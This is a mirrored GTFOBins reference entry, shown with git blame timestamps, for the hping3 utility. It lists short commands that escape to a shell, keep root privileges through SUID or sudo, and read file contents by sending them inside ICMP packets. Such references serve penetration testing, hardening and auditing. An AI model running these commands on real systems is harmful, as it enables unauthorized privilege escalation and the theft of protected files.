1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/hping3.md

21 lines
469 B
Markdown
Raw Normal View History

2020-12-30 08:47:47 +01:00
---
functions:
shell:
- code: |
hping3
2021-01-18 09:19:35 +01:00
/bin/sh
suid:
- code: |
./hping3
/bin/sh -p
2022-09-30 20:02:46 +02:00
file-read:
- description: It is possible to send specific file contents if hping3 has sufficient permission.
- code: |
2022-09-30 20:06:53 +02:00
sudo hping3 --icmp 127.0.0.1 --listen --signature --safe
sudo hping3 --icmp 127.0.0.1 --d 100 --c 2 --sign signature --file ./file.txt
2020-12-30 08:47:47 +01:00
sudo:
- code: |
sudo hping3
/bin/sh
---